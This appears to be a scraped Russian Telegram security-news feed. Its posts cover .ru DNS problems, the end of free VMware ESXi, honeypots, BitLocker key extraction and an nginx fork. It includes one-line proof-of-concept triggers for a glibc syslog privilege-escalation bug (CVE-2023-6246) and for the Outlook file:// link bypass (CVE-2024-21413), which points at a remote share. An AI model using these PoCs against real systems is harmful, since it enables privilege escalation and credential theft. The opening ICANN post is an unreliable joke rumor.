Отец знакомого работает в ICANN. Сегодня срочно вызвали на совещание. Вернулся поздно и ничего не объяснил. Сказал лишь переслать hosts. Сейчас едем куда-то далеко за город. Не знаю что происходит, но мне кажется началось...
😁4🥰1
🚬 Домены .ru регистрируются, но на серверах не появляются и пользоваться ими нельзя. Нельзя так же сменить NS или ключи DNSSEC для своих доменов второго уровня в .ru
Linux LPE- CVE-2023-6246: Heap-based buffer overflow in the glibc's syslog
POC (exec -a "
POC (exec -a "
printf '%0128000x' 1" /usr/bin/su < /dev/null). Ну и наверно много приколов принесет %0128000x, попавшее в сислог тем или иным способом и приводящее к сигфолту.🚬 Сегодня отмечается День "Измените свой пароль"! Этот день напоминает нам о важности безопасности в сети и регулярного обновления паролей. Каждый из нас подвержен риску хакерских атак или киберпреступности, поэтому защита наших аккаунтов и личной информации должна быть приоритетом. Но давно пора переходить на passwordless технологии...
🍯🍯🍯 Слишком много хонейпотов. Вот тут подсчитали, что на 4200 реально торчащих в интернет Atlassian Confluence серверов приходится почти 235.000 приманок/honeypots. Honeypots — это очень хорошая возможность для защитников детектить вредоносную активность, но их растущая популярность значительно усложняет понимание реальной поверхности атаки и затронутых систем для защитников, а не только для злоумышленников.
This media is not supported in your browser
VIEW IN TELEGRAM
Извлечение ключей BitLocker из доверенного платформенного модуля на примере Lenovo X1 Carbon менее чем за минуту.
👍2😢1
Nginx от Рамблера дедушки ушел, потом от F5 бабушки ушел...
https://mailman.nginx.org/pipermail/nginx-devel/2024-February/K5IC6VYO2PB7N4HRP2FUQIBIBCGP4WAU.html
https://mailman.nginx.org/pipermail/nginx-devel/2024-February/K5IC6VYO2PB7N4HRP2FUQIBIBCGP4WAU.html
12 февраля 2024 года компания Broadcom, владеющая VMware, прекратила распространение бесплатных версий VMware vSphere Hypervisor ESXi 7.x и 8.x. Всё.
https://kb.vmware.com/s/article/2107518
Бесплатных продуктов от VMware теперь нет.
Давно пора тем кто еще не - переезжать на Proxmox.
https://kb.vmware.com/s/article/2107518
Бесплатных продуктов от VMware теперь нет.
Давно пора тем кто еще не - переезжать на Proxmox.
👍1
Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413 . Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019.
Уязвимость позволяет обходить встроенные защиты Outlook для вредоносных ссылок, встроенных в электронные письма, используя протокол file://, обращаясь через него к удалённому серверу злоумышленников.
Добавление восклицательного знака сразу после расширения документа позволяет обойти ограничения безопасности Outlook. В этом случае при нажатии на ссылку приложение будет обращаться к удалённому ресурсу и открывать целевой файл без вывода предупреждений или ошибок.
<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>
PoC
Уязвимость позволяет обходить встроенные защиты Outlook для вредоносных ссылок, встроенных в электронные письма, используя протокол file://, обращаясь через него к удалённому серверу злоумышленников.
Добавление восклицательного знака сразу после расширения документа позволяет обойти ограничения безопасности Outlook. В этом случае при нажатии на ссылку приложение будет обращаться к удалённому ресурсу и открывать целевой файл без вывода предупреждений или ошибок.
<a href="file:///\\10.10.111.111\test\test.rtf!something">ССЫЛКА</a>
PoC